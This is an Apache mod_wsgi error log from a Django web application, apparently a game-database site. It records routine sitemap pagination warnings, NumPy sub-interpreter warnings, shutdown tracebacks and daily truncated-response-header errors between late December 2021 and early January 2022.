[Tue Dec 28 00:28:27.487153 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Tue Dec 28 00:28:27.487198 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 28 00:28:31.172024 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Tue Dec 28 00:28:31.172076 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 28 00:28:31.216737 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Tue Dec 28 00:28:31.216780 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 28 00:28:31.294048 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Tue Dec 28 00:28:31.294094 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128]   return paginator.Paginator(self._items(), self.limit)
Exception ignored in: <function Local.__del__ at 0x7f59f7367c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Tue Dec 28 02:39:32.263385 2021] [wsgi:error] [pid 658876:tid 140024507623168] [remote 185.191.171.23:58826] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Tue Dec 28 02:39:32.263425 2021] [wsgi:error] [pid 658876:tid 140024507623168] [remote 185.191.171.23:58826] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Tue Dec 28 02:39:32.263430 2021] [wsgi:error] [pid 658876:tid 140024507623168] [remote 185.191.171.23:58826]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7367c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Tue Dec 28 04:28:38.501028 2021] [wsgi:error] [pid 660697:tid 140024507623168] [remote 185.191.171.34:63086] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Tue Dec 28 04:28:38.501119 2021] [wsgi:error] [pid 660697:tid 140024507623168] [remote 185.191.171.34:63086] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Tue Dec 28 04:28:38.501126 2021] [wsgi:error] [pid 660697:tid 140024507623168] [remote 185.191.171.34:63086]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7368c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Tue Dec 28 04:29:20.283554 2021] [wsgi:error] [pid 661500:tid 140024507623168] [remote 185.191.171.3:31358] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Tue Dec 28 04:29:20.283604 2021] [wsgi:error] [pid 661500:tid 140024507623168] [remote 185.191.171.3:31358] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Tue Dec 28 04:29:20.283609 2021] [wsgi:error] [pid 661500:tid 140024507623168] [remote 185.191.171.3:31358]   __import__(dependency)
[Wed Dec 29 00:00:07.788295 2021] [wsgi:error] [pid 661513:tid 140024339207936] [client 206.189.33.118:60292] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Wed Dec 29 00:00:53.621667 2021] [wsgi:error] [pid 679530:tid 140024507623168] [remote 185.191.171.20:52418] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 29 00:00:53.621732 2021] [wsgi:error] [pid 679530:tid 140024507623168] [remote 185.191.171.20:52418] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 29 00:00:53.621738 2021] [wsgi:error] [pid 679530:tid 140024507623168] [remote 185.191.171.20:52418]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7367c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 29 08:05:12.150729 2021] [wsgi:error] [pid 688244:tid 140024507623168] [remote 54.36.148.108:59625] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 29 08:05:12.150778 2021] [wsgi:error] [pid 688244:tid 140024507623168] [remote 54.36.148.108:59625] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 29 08:05:12.150805 2021] [wsgi:error] [pid 688244:tid 140024507623168] [remote 54.36.148.108:59625]   __import__(dependency)
[Thu Dec 30 00:00:07.949121 2021] [wsgi:error] [pid 688258:tid 140024507623168] [client 206.189.33.118:56090] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Thu Dec 30 00:01:09.422797 2021] [wsgi:error] [pid 701409:tid 140024507623168] [remote 185.191.171.10:46232] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Thu Dec 30 00:01:09.422847 2021] [wsgi:error] [pid 701409:tid 140024507623168] [remote 185.191.171.10:46232] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Thu Dec 30 00:01:09.422851 2021] [wsgi:error] [pid 701409:tid 140024507623168] [remote 185.191.171.10:46232]   __import__(dependency)
[Fri Dec 31 00:00:07.232781 2021] [wsgi:error] [pid 702537:tid 140024474052352] [client 206.189.33.118:57012] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Fri Dec 31 00:00:55.115966 2021] [wsgi:error] [pid 721270:tid 140024507623168] [remote 185.191.171.23:64424] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 31 00:00:55.116024 2021] [wsgi:error] [pid 721270:tid 140024507623168] [remote 185.191.171.23:64424] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 31 00:00:55.116031 2021] [wsgi:error] [pid 721270:tid 140024507623168] [remote 185.191.171.23:64424]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7367c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 31 02:39:59.044837 2021] [wsgi:error] [pid 723735:tid 140024507623168] [remote 185.191.171.36:64300] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 31 02:39:59.044903 2021] [wsgi:error] [pid 723735:tid 140024507623168] [remote 185.191.171.36:64300] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 31 02:39:59.044909 2021] [wsgi:error] [pid 723735:tid 140024507623168] [remote 185.191.171.36:64300]   __import__(dependency)
[Sat Jan 01 00:00:07.148752 2022] [wsgi:error] [pid 724038:tid 140024246888192] [client 206.189.33.118:58948] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sat Jan 01 00:00:33.924373 2022] [wsgi:error] [pid 744480:tid 140024507623168] [remote 185.191.171.1:63414] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sat Jan 01 00:00:33.924433 2022] [wsgi:error] [pid 744480:tid 140024507623168] [remote 185.191.171.1:63414] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sat Jan 01 00:00:33.924438 2022] [wsgi:error] [pid 744480:tid 140024507623168] [remote 185.191.171.1:63414]   __import__(dependency)
[Sun Jan 02 00:00:07.989757 2022] [wsgi:error] [pid 751211:tid 140024381171456] [client 206.189.33.118:58374] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sun Jan 02 00:00:57.926587 2022] [wsgi:error] [pid 768133:tid 140024507623168] [remote 51.222.253.8:55700] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Jan 02 00:00:57.926630 2022] [wsgi:error] [pid 768133:tid 140024507623168] [remote 51.222.253.8:55700] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Jan 02 00:00:57.926651 2022] [wsgi:error] [pid 768133:tid 140024507623168] [remote 51.222.253.8:55700]   __import__(dependency)
[Mon Jan 03 00:00:07.079043 2022] [wsgi:error] [pid 768147:tid 140024314029824] [client 206.189.33.118:54374] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Mon Jan 03 00:00:25.815125 2022] [wsgi:error] [pid 792301:tid 140024507623168] [remote 51.222.253.17:46138] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Jan 03 00:00:25.815183 2022] [wsgi:error] [pid 792301:tid 140024507623168] [remote 51.222.253.17:46138] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Jan 03 00:00:25.815188 2022] [wsgi:error] [pid 792301:tid 140024507623168] [remote 51.222.253.17:46138]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7367c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Jan 03 01:42:21.515225 2022] [wsgi:error] [pid 794327:tid 140024507623168] [remote 216.244.66.239:58194] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Jan 03 01:42:21.515295 2022] [wsgi:error] [pid 794327:tid 140024507623168] [remote 216.244.66.239:58194] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Jan 03 01:42:21.515301 2022] [wsgi:error] [pid 794327:tid 140024507623168] [remote 216.244.66.239:58194]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7367c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Jan 03 04:01:18.948327 2022] [wsgi:error] [pid 797732:tid 140024507623168] [remote 51.222.253.1:56480] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Jan 03 04:01:18.948388 2022] [wsgi:error] [pid 797732:tid 140024507623168] [remote 51.222.253.1:56480] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Jan 03 04:01:18.948395 2022] [wsgi:error] [pid 797732:tid 140024507623168] [remote 51.222.253.1:56480]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7368c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Jan 03 04:01:56.651347 2022] [wsgi:error] [pid 798123:tid 140024507623168] [remote 51.222.253.16:51368] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Jan 03 04:01:56.651403 2022] [wsgi:error] [pid 798123:tid 140024507623168] [remote 51.222.253.16:51368] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Jan 03 04:01:56.651408 2022] [wsgi:error] [pid 798123:tid 140024507623168] [remote 51.222.253.16:51368]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7367c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Jan 03 04:02:30.604045 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 51.222.253.18:47774] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Jan 03 04:02:30.604096 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 51.222.253.18:47774] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Jan 03 04:02:30.604101 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 51.222.253.18:47774]   __import__(dependency)
[Mon Jan 03 06:55:53.487967 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Mon Jan 03 06:55:53.488883 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348]   return paginator.Paginator(self._items(), self.limit)
[Mon Jan 03 06:55:53.670083 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Mon Jan 03 06:55:53.670135 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348]   return paginator.Paginator(self._items(), self.limit)
[Mon Jan 03 06:55:53.989991 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Mon Jan 03 06:55:53.990040 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348]   return paginator.Paginator(self._items(), self.limit)
[Mon Jan 03 06:55:57.406400 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Mon Jan 03 06:55:57.406454 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348]   return paginator.Paginator(self._items(), self.limit)
[Mon Jan 03 06:55:57.451422 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Mon Jan 03 06:55:57.451472 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348]   return paginator.Paginator(self._items(), self.limit)
[Mon Jan 03 06:55:57.544033 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Mon Jan 03 06:55:57.544079 2022] [wsgi:error] [pid 798543:tid 140024507623168] [remote 66.249.79.74:49348]   return paginator.Paginator(self._items(), self.limit)
[Tue Jan 04 00:00:06.782813 2022] [wsgi:error] [pid 798557:tid 140024288851712] [client 206.189.33.118:52874] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Tue Jan 04 00:00:30.696341 2022] [wsgi:error] [pid 814748:tid 140024507623168] [remote 51.222.253.17:56510] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Tue Jan 04 00:00:30.696397 2022] [wsgi:error] [pid 814748:tid 140024507623168] [remote 51.222.253.17:56510] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Tue Jan 04 00:00:30.696422 2022] [wsgi:error] [pid 814748:tid 140024507623168] [remote 51.222.253.17:56510]   __import__(dependency)
[Wed Jan 05 00:00:07.380858 2022] [wsgi:error] [pid 814762:tid 140024499230464] [client 206.189.33.118:59738] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Wed Jan 05 00:00:59.333247 2022] [wsgi:error] [pid 839078:tid 140024482445056] [remote 51.222.253.12:47748] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Jan 05 00:00:59.333290 2022] [wsgi:error] [pid 839078:tid 140024482445056] [remote 51.222.253.12:47748] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Jan 05 00:00:59.333295 2022] [wsgi:error] [pid 839078:tid 140024482445056] [remote 51.222.253.12:47748]   __import__(dependency)
[Wed Jan 05 02:06:56.159758 2022] [wsgi:error] [pid 843069:tid 140024507623168] [remote 185.191.171.40:28936] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Jan 05 02:06:56.162078 2022] [wsgi:error] [pid 843069:tid 140024507623168] [remote 185.191.171.40:28936] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Jan 05 02:06:56.162099 2022] [wsgi:error] [pid 843069:tid 140024507623168] [remote 185.191.171.40:28936]   __import__(dependency)
